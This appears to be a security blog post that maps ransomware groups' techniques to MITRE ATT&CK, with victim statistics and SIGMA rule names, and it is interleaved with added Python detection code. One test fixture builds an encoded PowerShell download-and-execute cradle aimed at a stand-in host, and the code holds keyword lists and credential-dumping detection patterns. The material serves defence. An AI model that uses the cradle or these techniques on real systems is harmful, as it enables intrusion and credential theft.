There are many variants of ransomware; in this blog I researched some of the most active and destructive ones. It provides analysis of specific families (listed below) and their associated activities. I have researched and documented the information from different security researchers, vendors, CISA, Microsoft, MITRE ATT&CK and GitHub.
The 8 most active ransomware groups are:
- Conti/Ryuk
- Pysa
- Clop
- Hive
- Lockbit2.0
- RagnarLocker
- BlackByte
- BlackCat
This blog lays out the MITRE ATT&CK Tactics, Techniques and Procedures (TTPs) used by the different ransomware groups, to give a better understanding of the tactical path taken by the attackers.
The tables below show the count of ransomware victim organizations by top location and by top industry through June 2022.
| Ransomware family | Top locations (count of victim organizations) |
|---|---|
| Conti/Ryuk | United States (237), Great Britain (38), Germany (31), France (26), Canada (24) |
| Pysa | United States (67), Great Britain (14), Austria (9), Germany (5), Canada (4) |
| Clop | United States (54), Canada (6), Italy (6), Austria (6), Germany (5) |
| Hive | United States (28), China (3), Germany (3), Australia (2), Belgium (2), Netherlands (2) |
| Everest | France (14), United States (13), Canada (9), Austria (7), Italy (4) |
| Ragnarlocker | United States (13), India (4), France (2), Slovakia (2), Spain (2) |
| Lockbit | United States (7), Italy (7), Great Britain (3), Mexico (2), Brazil (2) |
| BlackCat | United States (5), Italy (3), Austria (3), Hong Kong (1), Switzerland (1) |
| Vicesociety | United States (11), Germany (2), New Zealand (1), Netherlands (1), Canada (1) |
| BlackByte | United States (11), Germany (3), Russia (1), Netherlands (1), Mexico (1) |

| Ransomware family | Top industries (count of victim organizations) |
|---|---|
| Conti/Ryuk | Manufacturer (45), Construction (19), Software development (16), Legal (6), Insurance |
| Pysa | Education (18), Manufacturer (3) |
| Clop | Software development (9), Legal (8), Manufacturer (5), Education (4), Consulting (3) |
| Hive | Small business (14), Hospital (7), Legal (5), Real estate (4), Transport (4) |
| Ragnarlocker | Manufacturer (3), Software development (3), Legal (2), Pharmaceutical (2), Aircraft building (2) |
| Lockbit | Small business (12), Legal (2) |
| BlackCat | Small business (6), Manufacturer (3), Consulting (2) |
| BlackByte | Small business (5), Construction (2), Consulting (2) |
Security professionals can learn about the different stages of the attack path, get a visual description of how to defend against each class of attack, and find the associated SIGMA detection rules on GitHub, which can be applied to your infrastructure as part of your own SIEM solution.
In Part 1 we will cover the TTPs and the SIGMA rules associated with them; in Part 2 we will discuss how Microsoft can help organizations counter ransomware attacks.
**********************************************************************************************************************
Tactics – Initial Access
Initial Access techniques used to gain a foothold include targeted spear phishing and exploitation of vulnerabilities on public-facing web servers. Footholds obtained through initial access may allow continued access, for example via valid accounts and external remote services.
Techniques Used by different Variants

Attackers can take advantage of externally facing remote services to initially gain access to and/or remain in a network. Remote services such as VPNs, Citrix, and other access mechanisms allow users to connect to internal corporate network resources from remote locations. There are often remote service gateways that manage connections and credentials for these services. Services such as RDP and VNC can also be used externally.
Some procedures include:
- Enabling RDP via Registry
- Enabling RDP in Windows Firewall
Attackers may attempt to exploit a vulnerability in an Internet-accessible web service or program by using software, data, or commands to cause unintended or unexpected behavior. The weak point in the system can be a bug or a design flaw. These applications are often websites, but can include databases (like SQL), standard services (like SMB or SSH), network device administration and management protocols (like SNMP and Smart Install), and any other application with open sockets accessible from the Internet, such as web servers and related services.
Some procedures include:
- Windows Shell Start by Web Applications
Attackers can send phishing messages to gain access to victim systems. All forms of phishing are social engineering delivered electronically. Phishing can be targeted, which is known as spear phishing: a specific person, company or industry is targeted by the attacker. Attackers can also perform untargeted phishing, such as bulk malware spam campaigns.
**********************************************************************************************************************
Tactics – Execution
Execution includes techniques that result in attacker-controlled code running on a local or remote system. Malicious code execution techniques are often combined with other tactics to achieve broader goals, such as exploring a network or stealing data. For example, an attacker could use a remote access tool to run a PowerShell script that performs remote system discovery.
Techniques Used by different Variants

Attackers can rely on users to open malicious files for execution. Users may be socially engineered to open files that would lead to code execution. This user action is often seen as a continuation of a phishing attachment. Attackers can use several file types that require user execution, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.
Some procedures include:
- Windows Shell Started from Trusted Process
- Execution File Dropped by Trusted Process
Attackers can abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages allow interaction between computer systems and are a common feature of many different platforms. Most systems have some built-in command-line interfaces and scripting capabilities, for example, macOS and Linux distributions include some Unix Shell, while Windows installations include Windows Command Shell and PowerShell.
Some procedures include:
- Execution of Downloaded Powershell Code
- Encoded/decoded PowerShell Code Execution
- Executing PS1 from Public Directory
- Powershell Suspicious Arguments
- Executing JavaScript from Public Directories
Attackers can abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administrative tool that provides a unified environment for accessing Windows system components. WMI services support local and remote access, but the latter is facilitated by remote services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM). DCOM remote WMI runs on port 135, while WinRM WMI runs on port 5985 over HTTP and 5986 over HTTPS.
Some procedures include:
- Suspicious Command wmic.exe
- Suspicious Child Process Wmiprvse.exe
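The SIGMA rules named in these procedure lists (for instance "Enabling RDP via Registry" under Initial Access and "Executing PS1 from Public Directory" here) all reduce to field matching over process-creation and registry events. The following Python is an added example, not code from the original post or from the Sigma project: it implements a minimal Sigma-style matcher and runs two rules of that shape over constructed events; the field names follow Sysmon, and the svchost.exe filter is a hypothetical tuning choice.

```python
"""Minimal Sigma-style rule matcher over constructed Sysmon-like events."""

# Constructed sample events (not real telemetry). EventID 1 = process
# creation, EventID 13 = registry value set, as Sysmon records them.
EVENTS = [
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Users\Public\update.ps1",
     "ParentImage": r"C:\Windows\System32\cmd.exe"},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -File C:\Program Files\Vendor\maint.ps1",
     "ParentImage": r"C:\Windows\System32\services.exe"},
    {"EventID": 13,
     "Image": r"C:\Windows\regedit.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
    {"EventID": 13,
     "Image": r"C:\Windows\System32\svchost.exe",
     "TargetObject": r"HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections",
     "Details": "DWORD (0x00000000)"},
]

# Rules written in the shape of a Sigma 'detection' section. Supported
# modifiers: contains, startswith, endswith, all; conditions are selection
# names joined by 'and' / 'and not'.
RULES = {
    "Executing PS1 from Public Directory": {
        "sel_image": {"EventID": 1, "Image|endswith": "\\powershell.exe"},
        "sel_dir": {"CommandLine|contains": ["\\Users\\Public\\", "\\ProgramData\\", "\\Windows\\Temp\\"]},
        "sel_ext": {"CommandLine|contains": ".ps1"},
        "condition": "sel_image and sel_dir and sel_ext",
    },
    "Enabling RDP via Registry": {
        "selection": {"EventID": 13,
                      "TargetObject|endswith": "\\Terminal Server\\fDenyTSConnections",
                      "Details": "DWORD (0x00000000)"},
        # Hypothetical tuning filter: policy-driven changes made by svchost.exe
        # are excluded here; adjust to what is normal in the environment.
        "filter": {"Image|endswith": "\\svchost.exe"},
        "condition": "selection and not filter",
    },
}


def _compare(mods, actual, expected):
    """Apply one Sigma modifier; string matching is case-insensitive as in Sigma."""
    if not isinstance(expected, str):
        return actual == expected
    a, e = str(actual).lower(), expected.lower()
    if "contains" in mods:
        return e in a
    if "endswith" in mods:
        return a.endswith(e)
    if "startswith" in mods:
        return a.startswith(e)
    return a == e


def match_selection(selection, event):
    """True when every field in the selection matches the event."""
    for key, expected in selection.items():
        field, *mods = key.split("|")
        if field not in event:
            return False
        values = expected if isinstance(expected, list) else [expected]
        results = [_compare(mods, event[field], v) for v in values]
        if not (all(results) if "all" in mods else any(results)):
            return False
    return True


def evaluate(rule, event):
    """Evaluate a conjunctive condition such as 'a and b' or 'a and not b'."""
    result, negate = True, False
    for token in rule["condition"].split():
        if token == "and":
            continue
        if token == "not":
            negate = True
            continue
        hit = match_selection(rule[token], event)
        result = result and (not hit if negate else hit)
        negate = False
    return result


def run_rules(events, rules=RULES):
    """Return (event index, rule title) pairs for every rule that fires."""
    return [(i, title) for i, ev in enumerate(events)
            for title, rule in rules.items() if evaluate(rule, ev)]
```

Running `run_rules(EVENTS)` fires on the script in C:\Users\Public and on the regedit.exe change, and stays silent on the vendor script and the filtered svchost.exe write.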
**********************************************************************************************************************
Tactics – Persistence
Persistence includes techniques that attackers use to maintain access to a system across reboots, credential changes and other interruptions that could cut off their access. Techniques used to ensure persistence include any access, manipulation, or configuration change that lets them keep a foothold on the system, such as replacing or hijacking legitimate code or adding startup code.
Techniques Used by different Variants

Attackers can abuse the Windows Task Scheduler to schedule the initial or recurring execution of malicious code. There are several ways to access Task Scheduler in Windows. The schtasks utility can be run directly from the command line, or Task Scheduler can be opened from the GUI in the Administrative Tools section of Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and adversaries have also used the Windows netapi32 library to create a scheduled task.
Some procedures include:
- Scheduled Task Start from Public Directory
- Windows Shell Started Schtasks
Attackers can achieve persistence by adding a program to a startup folder or referencing it with a registry key. Adding an entry to “run keys” in the registry or startup folder causes the referenced program to run when a user logs in. These programs run in the context of the user and have the privilege level associated with the account.
Placing a program in a startup folder also causes that program to run when a user logs on. There is a startup folder for individual user accounts, as well as a system-wide startup folder that is checked regardless of which user account logs in.
Some procedures include:
- Modification of Main Registry Run Keys
- Adding Path of Open Folder in Run Keys via Registry
- Adding Suspicious File in Autorun Keys via Registry
- Suspicious File Creation in Startup Folder
Attackers can manipulate accounts to maintain access to victim systems. Account manipulation can be any action that preserves attackers’ access to a compromised account, such as changing credentials or authorization groups. These actions may also include account activity designed to circumvent security policies, such as performing iterative password updates to get around password expiration policies and extend the lifespan of compromised credentials.
Some procedures include:
- Account Creation via Powershell
- Account Creation via net.exe
- Adding Account in Domain or Local Admin Group via net.exe
- Adding Account in Domain or Local Admin Group via PowerShell
Attackers can create or modify Windows services to repeatedly run malicious payloads as part of persistence. When Windows starts, it starts programs or applications called services that perform system functions in the background. Windows service configuration information, including the path to service executables or recovery programs/commands, is stored in the Windows registry. Attackers can install a new service or modify an existing service that runs at startup to persist on a system. Service configurations can be set or changed using system utilities (such as sc.exe), by directly editing the registry, or by interacting directly with the Windows API.
Some procedures include:
- Service Installation from Non-System Directory
- Service Image Path Modification via sc.exe
Attackers can abuse BITS tasks to persistently execute or clean up malicious payloads. Windows Background Intelligent Transfer Service (BITS) is a low-bandwidth asynchronous file transfer mechanism provided through the component object model (COM). BITS is commonly used by updaters, messengers, and other applications that prefer to work in the background (using available idle bandwidth) without interrupting other network applications. File transfer jobs are implemented as BITS jobs that contain a queue of one or more file operations.
Some procedures include:
- File Download via Bitsadmin
- Suspicious Jobs via Bitsadmin
**********************************************************************************************************************
Tactics – Privilege Escalation
Privilege escalation consists of techniques that attackers use to obtain higher permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access, but they need elevated permissions to achieve their goals. Common approaches are to exploit system weaknesses, misconfigurations, and vulnerabilities. Examples of elevated access include:
- SYSTEM / root level
- local administrator
- user account with administrator access
- user account with access to a specific system or perform a specific function
Techniques Used by different Variants

Attackers can bypass User Account Control (UAC) mechanisms to elevate process privileges on the system. Windows UAC allows a program to raise its privileges (tracked as integrity levels ranging from low to high) to perform a task with administrator-level permissions, possibly prompting the user for confirmation. The impact on the user ranges from the operation being denied outright to the user being allowed to perform the action if they are in the local administrators group and click through the prompt, or enter an administrator password to complete the action.
Some procedures include:
- UAC Bypass via COM Object
- Disabling UAC via Registry
Attackers can exploit software vulnerabilities in an attempt to escalate privileges. Exploitation of a software vulnerability occurs when an attacker takes advantage of a programming flaw in an operating system program, service, application, or the kernel itself to execute adversary-controlled code. Security constructs such as permission levels often restrict access to information and the use of certain techniques, so attackers may need to escalate privileges, including through software exploitation, to circumvent those restrictions.
Some procedures include:
- Created Windows Shell from Critical Windows Process
Attackers can modify access tokens to operate under a different user or system security context to perform actions and circumvent access controls. Windows uses access tokens to determine ownership of a running process. A user can manipulate access tokens to make a running process appear to be the child of another process or to belong to someone other than the user who started the process. When this happens, the process also inherits the security context associated with the new token.
Some procedures include:
- Get-System Detection (Empire, CobaltStrike, Metasploit Meterpreter)
**********************************************************************************************************************
Tactics – Defense Evasion
Defense evasion consists of techniques that attackers use to avoid detection throughout their compromise. Techniques used to evade defenses include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Attackers also use and abuse trusted processes to hide and mask their malware. Techniques from other tactics are listed here as well when they have the added benefit of undermining defenses.
Techniques Used by different Variants

Attackers can evade process-based and/or signature-based defenses by proxy execution of malicious content with signed or otherwise trusted binaries. The binaries used in this technique are often files signed by Microsoft, indicating that they have been downloaded from Microsoft or are already included with the operating system. Binary files signed with trusted digital certificates typically run on Windows systems that are protected by digital signature validation. Several Microsoft-signed binaries that are standard in Windows installations can be used to proxy other files or commands.
Some procedures include:
- Shell Creation by Mshta.exe
- External HTA file Execution
- Executing HTA file from Public Directory
- Shell Creation by Regsvr32.exe
- External DLL Execution via Regsvr32.exe
- Shell Creation by Rundll32.exe
- External DLL Execution via Rundll32
- Suspicious Rundll32.exe Arguments
Attackers can inject code into processes to bypass process-based defenses and potentially elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Executing code in the context of another process can allow access to process memory, system/network resources, and possibly elevated privileges. Execution via process injection can also evade detection by security products by hiding the execution under a legitimate process.
Some procedures include:
- Remote Thread Creation in Critical Process
- DLL Injection via LoadLibrary API
Attackers can modify and/or disable security tools to avoid detection of their malware/tools and activities. This can take several forms, such as terminating security software processes or services, modifying/deleting registry keys or configuration files so that the tools no longer work properly, or otherwise interfering with the security software’s analysis or its reporting of information.
Some procedures include:
- Disabling Windows Defender via Registry
- Disabling or Modifying Windows Defender via PowerShell
- Windows Defender Exclusions Modification via Registry
Attackers can disable or modify system firewalls to bypass controls that limit network usage. Changes can include disabling the entire mechanism, adding, removing, or modifying specific rules. This can be done in a number of ways depending on your operating system, including using the command line, editing Windows registry keys, and the Windows Control Panel.
Some procedures include:
- Disabling Windows Firewall via Netsh.exe
- Firewall Configuration Modification via Netsh.exe
Attackers can attempt to manipulate the characteristics of their artifacts to make them appear legitimate or harmless to users and/or security tools. Masquerading occurs when the name or location of a legitimate or malicious object is manipulated or abused to evade defenses and observation. This can include manipulating file metadata, tricking users into misidentifying the file type, and assigning legitimate task or service names.
Some procedures include:
- Executing File Named as System Process in Unusual Directory
- Anomaly in the Windows Critical Process Tree
- Created Windows Shell from Critical Windows Process
Attackers can clear Windows event logs to hide intrusion activity. Windows event logs are a record of a computer’s alerts and notifications. There are three system-defined event sources: system, application, and security, with five types of events: error, warning, information, success audit, and failure audit.
Some procedures include:
- Clear Windows Event Logs via Command Line
- Clear Windows Event Logs
Attackers can delete files left behind by their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an attacker (e.g. via Ingress Tool Transfer) can leave traces that indicate what was done within a network and how. Deletion of these files can occur during an intrusion or as part of post-intrusion cleanup to minimize the attacker’s footprint.
Some procedures include:
- Ping and File Deletion in Command line
Attackers can use obfuscated files or information to hide intrusion artifacts from analysis. They may need separate mechanisms to decode or decrypt this information depending on how they intend to use it. Methods for doing this include built-in malware functionality or utilities present on the system.
Some procedures include:
- Encoded/decoded PowerShell Code Execution
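The "Encoded/decoded PowerShell Code Execution" procedure listed under both Execution and Defense Evasion depends on one detail: the -EncodedCommand argument of powershell.exe is base64 over UTF-16LE text, so a detection can decode it and inspect the script rather than only flag the presence of the switch. This Python is an added example, not code from the original post; the command lines and the indicator list are constructed.

```python
"""Decode PowerShell -EncodedCommand arguments and flag risky decoded content."""
import base64


def _enc(script: str) -> str:
    """Encode a script the way PowerShell expects: base64 over UTF-16LE."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed command lines (not real telemetry). The second one wraps a
# download-and-execute pattern that points at a reserved .invalid hostname.
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -EncodedCommand " + _enc("Write-Host 'nightly inventory'"),
    "powershell.exe -nop -w hidden -enc "
    + _enc("IEX (New-Object Net.WebClient).DownloadString('http://c2.example.invalid/a')"),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

# Substrings commonly seen in malicious encoded commands; extend as needed.
SUSPICIOUS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
              "frombase64string", "net.webclient", "invoke-webrequest", "-w hidden")


def extract_encoded(cmdline: str):
    """Return the base64 argument following an -EncodedCommand style switch.

    powershell.exe accepts any unambiguous prefix of the parameter name
    (-e, -ec, -enc, ...), so the switch is matched as a prefix of 'encodedcommand'.
    """
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        flag = tok[1:].lower()
        if flag and "encodedcommand".startswith(flag):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64: str):
    """Decode base64 + UTF-16LE; return None when the argument is not valid."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def assess(cmdline: str) -> dict:
    """Decode an encoded command line and list the indicators found in it."""
    b64 = extract_encoded(cmdline)
    if b64 is None:
        return {"encoded": False, "decoded": None, "indicators": []}
    decoded = decode_encoded_command(b64)
    # Search the visible switches plus the decoded script, not the base64
    # blob itself, so random base64 substrings cannot trigger an indicator.
    text = (cmdline.replace(b64, "") + " " + (decoded or "")).lower()
    return {"encoded": True, "decoded": decoded,
            "indicators": [s for s in SUSPICIOUS if s in text]}
```

The benign sample decodes to a plain Write-Host with no indicators, while the second yields the download cradle together with the hidden-window switch on the outer command line.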
**********************************************************************************************************************
Tactics – Credential Access
Credential Access consists of techniques for stealing credentials such as account names and passwords. Techniques used to obtain credentials include keylogging or credential dumping. Using legitimate credentials can allow attackers to log into systems, make them harder to detect, and allow them to create multiple accounts to achieve their goals.
Techniques Used by different Variants

Attackers can attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs in, the system generates and stores a variety of credential material in LSASS process memory. This material can be harvested by an administrative user or by SYSTEM and used to perform lateral movement with the stolen credentials.
Some procedures include:
- Suspicious LSASS Memory Access
- Detected Access to SAM, SYSTEM and SECURITY Registry Hives
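For the "Suspicious LSASS Memory Access" procedure above, the useful signal in a Sysmon Event ID 10 (ProcessAccess) record is the GrantedAccess mask, in particular whether PROCESS_VM_READ is requested, combined with the source image and the call trace. This Python triage routine is an added example, not code from the original post; the events and the allow-list of benign source images are constructed and must be replaced with a baseline from the actual environment.

```python
"""Triage Sysmon Event ID 10 (ProcessAccess) records that target lsass.exe."""

# Windows process access rights (subset) carried in the GrantedAccess mask.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_ALL_ACCESS = 0x1FFFFF

# Hypothetical allow-list of source images that routinely open lsass.exe;
# every environment needs its own, built from baseline telemetry.
BENIGN_SOURCES = {
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
}

# Constructed sample events (not real telemetry), shaped like Sysmon EID 10.
EVENTS = [
    {"SourceImage": r"C:\Users\alice\AppData\Local\Temp\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|UNKNOWN(00000000001A0000)"},
    {"SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|C:\Windows\SYSTEM32\csrsrv.dll+1234"},
    {"SourceImage": r"C:\Program Files\Vendor\monitor.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1400",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|C:\Program Files\Vendor\monitor.exe+5a10"},
    {"SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1410",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|C:\Windows\SYSTEM32\taskmgr.exe+2b00"},
    {"SourceImage": r"C:\Users\alice\AppData\Local\Temp\tool.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1fffff",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d1e4|UNKNOWN(00000000001A0000)"},
]


def assess_access(event):
    """Return a finding dict for a suspicious lsass.exe access, else None."""
    if not event.get("TargetImage", "").lower().endswith("\\lsass.exe"):
        return None
    source = event.get("SourceImage", "")
    if source.lower() in BENIGN_SOURCES:
        return None
    mask = int(event["GrantedAccess"], 16)
    # Reading LSASS memory is what credential dumping needs; query-only
    # masks such as 0x1400 are common from monitoring tools and are ignored.
    if not (mask & PROCESS_VM_READ or mask == PROCESS_ALL_ACCESS):
        return None
    severity = "medium"
    # Calls from unbacked memory (UNKNOWN frames) or write/thread rights
    # point to injected or in-memory tooling rather than a normal binary.
    if "UNKNOWN" in event.get("CallTrace", "") or mask & (PROCESS_VM_WRITE | PROCESS_CREATE_THREAD):
        severity = "high"
    return {"severity": severity, "source": source, "mask": hex(mask)}


def triage(events):
    """Run assess_access over a batch of events and keep only the findings."""
    return [finding for finding in map(assess_access, events) if finding]
```

On the sample batch only the temp-folder tool (high, unbacked call frame) and taskmgr.exe (medium, read access but a normal call trace) are reported; the allow-listed, query-only and non-LSASS events are dropped.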
Attackers can acquire credentials from web browsers by reading files specific to the target browser. Web browsers typically store login information, such as website usernames and passwords, so that users do not need to enter them manually again. Web browsers typically keep credentials in an encrypted form in a credential store; however, there are methods to extract plaintext credentials from web browsers.
Some procedures include:
- Suspicious Access to Credentials from Web Browsers
Attackers can use brute force techniques to gain access to accounts when passwords are unknown or when password hashes have been obtained. Without knowing the password for an account or group of accounts, an attacker can systematically guess it using a repetitive or iterative mechanism. Password brute forcing can be done online, by interacting with a service that checks the validity of the credentials, or offline against previously captured credential material such as password hashes.
**********************************************************************************************************************
Tactics – Discovery
Discovery consists of techniques that an adversary can use to gain knowledge about the system and the internal network. These techniques help adversaries observe and orient themselves before deciding how to act. They also allow attackers to explore what they can control and what is close to their entry point to find out how it can benefit their current objective. Native operating system tools are often used for this purpose to gather information after compromise.
Techniques Used by different Variants

Attackers can try to obtain a list of network connections to or from the compromised system they currently have access to or from external systems by querying the network for information.
An adversary who gains access to a system that is part of a cloud-based environment can map virtual private clouds or virtual networks to determine which systems and services are connected. The actions performed are likely to be the same types of discovery techniques, depending on the operating system, but the resulting information may contain details about the networked cloud environment relevant to the attacker’s goals. Cloud service providers may have different ways in which their virtual networks work. Likewise, attackers accessing network devices can perform similar discovery activities to gather information about connected systems and services.
Some procedures include:
- System Network Connections Discovery via Standard Windows Utilities
- System Network Connections Discovery via PowerShell
Attackers can try to get a list of other systems by IP address, host name or other logical identifier on a network that can be used for lateral movement from the current system. Remote access tools may have built-in features for this, but attackers can also use utilities available on the operating system, such as ping or net view.
Some procedures include:
- Remote System Discovery via Standard Windows Utilities
- Remote System Discovery via PowerShell
Attackers can search shared folders and drives on remote systems to identify sources of harvestable information as precursors to harvesting and identify potential systems of interest for lateral movement. Networks often contain shared network drives and folders that allow users to access directories of files on different systems on a network.
Some procedures include:
- Network Share Discovery via Standard Windows Utilities
- Network Share Discovery via PowerShell
Attackers may attempt to get a listing of accounts on a system or within an environment.
Some procedures include:
- Account Discovery via Standard Windows Utilities
- Account Discovery via PowerShell
Attackers can enumerate files and folders or search specific locations on a host or network share for particular information within a file system. Attackers can use information from File and Directory Discovery during automated discovery to shape follow-on behavior, including whether or not the adversary fully infects the target and/or attempts specific actions.
Many command shell tools can be used to obtain this information. Examples are dir, tree, ls, find and locate. Custom tools can also be used to collect file and directory information and to interact with the native API. Attackers can also use a network device command line interface on network devices to gather file and directory information.
Adversaries can try to get information about the processes running on a system. The information obtained can be used to learn about common software/applications running on systems within the network. Attackers can use Process Discovery information during automated discovery to shape follow-on behavior, including whether or not the adversary fully infects the target and/or attempts specific actions.
Some procedures include:
- Process Discovery via Standard Windows Utilities
- Process Discovery via PowerShell
**********************************************************************************************************************
Tactics – Lateral Movement
Lateral movement consists of techniques used by attackers to enter and control remote systems on a network. In order to achieve their main objective, they often have to explore the network to find their target and then gain access to it. Reaching that goal often means pivoting through multiple systems and accounts. Attackers can install their own remote access tools to perform lateral movement or use legitimate credentials with native network and operating system tools, which can be stealthier.
Techniques Used by different Variants

Attackers can use valid accounts to access a service specifically designed to accept remote connections, such as telnet, SSH, and VNC. The adversary can then perform actions as the logged-in user.
In a corporate environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to log in with a set of credentials across the entire network. If an attacker can obtain a set of valid domain credentials, they can log into many different machines using remote access protocols such as Secure Shell (SSH) or Remote Desktop Protocol (RDP).
Some procedures include:
- Enabling RDP via Registry
- Enabling RDP in Windows Firewall
Attackers can use valid accounts to communicate with a remote network share using Server Message Block (SMB). The attacker can then perform actions as the logged-in user.
SMB is a file, printer, and serial port sharing protocol for Windows machines on the same network or domain. Attackers can use SMB to interact with file shares, allowing them to move laterally across a network. Linux and macOS implementations of SMB usually use Samba.
Some procedures include:
- PsExec Suspicious Commands
- PsExec Pipes Artefacts
- Mounting Shares via net
- Using Explicit Credentials while mounting Share
Attackers can transfer tools or other files between systems in a compromised environment. Once introduced into the victim’s environment (i.e. Ingress Tool Transfer), files can then be copied from one system to another to deliver adversary tools or other files during an operation. Attackers can copy files between victims’ internal systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB/Windows Admin Shares to connected network shares or with authenticated connections via Remote Desktop Protocol.
Some procedures include:
- File Download via Bitsadmin
- Psexec Suspicious Commands
- PsExec Pipes Artifacts
- Mounting Shares via net
- Using Explicit Credentials while mounting Share
**********************************************************************************************************************
Tactics – Command and Control
Command and Control consists of techniques that adversaries can use to interact with systems under their control within a victim network. Attackers usually try to mimic expected normal traffic to avoid detection. There are many ways an adversary can establish command and control with varying levels of stealth, depending on the structure of the network and the victim’s defenses.
Techniques Used by different Variants

Attackers can communicate via application layer protocols to avoid network detection/filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, are embedded in the protocol traffic between client and server.
Attackers can use many different protocols, including those used for web browsing, file transfer, email, or DNS. For connections that occur internally within an enclave (such as those between a proxy or hub node and other nodes), commonly used protocols are SMB, SSH, or RDP.
**********************************************************************************************************************
Tactics – Exfiltration
Exfiltration consists of techniques that attackers can use to steal data from your network. Once they have collected data, attackers often package it to avoid detection while removing it. This may include compression and encryption. Techniques for getting data out of a target network typically involve transmission over the command and control channel or an alternate channel, and may also involve imposing size limits on the transmission.
Techniques Used by different Variants

Attackers can steal data by exfiltrating it through an existing command and control channel. The stolen data is encoded in the normal communication channel, using the same protocol as command and control communications.
Attackers can exfiltrate data into a cloud storage service rather than through their main command and control channel. Cloud storage services allow you to store, modify and retrieve data from a remote cloud storage server on the Internet.
Examples of cloud storage services include OneDrive and Google Docs. Exfiltration to these cloud storage services can provide significant cover to the adversary if hosts within the network are already communicating with the service.
**********************************************************************************************************************
Tactics – Impact
Impact consists of techniques used by attackers to disrupt availability or compromise integrity by manipulating business and operational processes. Techniques used for impact may include destruction or manipulation of data. In some cases, business processes may appear to be working normally but have been altered to further the adversary’s goals. These techniques can be used by adversaries to achieve their end goal or to cover up a breach of confidentiality.
Techniques Used by different Variants

Attackers can delete or remove built-in operating system data and disable services designed to help recover a damaged system, in order to prevent recovery. This can deny access to available backups and restore options.
Operating systems may include features that help repair corrupted systems, such as the backup catalog, volume shadow copies, and automatic repair functions. Attackers can disable or remove these system recovery features to amplify the effects of data destruction and data encryption for impact.
Some procedures include:
- Shadow Copies Deletion
- Disable Automatic Windows Recovery
Adversaries can stop or disable services on a system to make those services unavailable to legitimate users. Stopping critical services or processes can inhibit or interrupt the response to an incident or help the adversary’s overall goal of causing damage to the environment.
Some procedures include:
- Service Stop via taskkill
- Service Stop via sc.exe
- Service Stop via Powershell.exe
- Service Stop via net.exe
**********************************************************************************************************************
♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥Thank You for Reading, See you in the next Blog♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥♥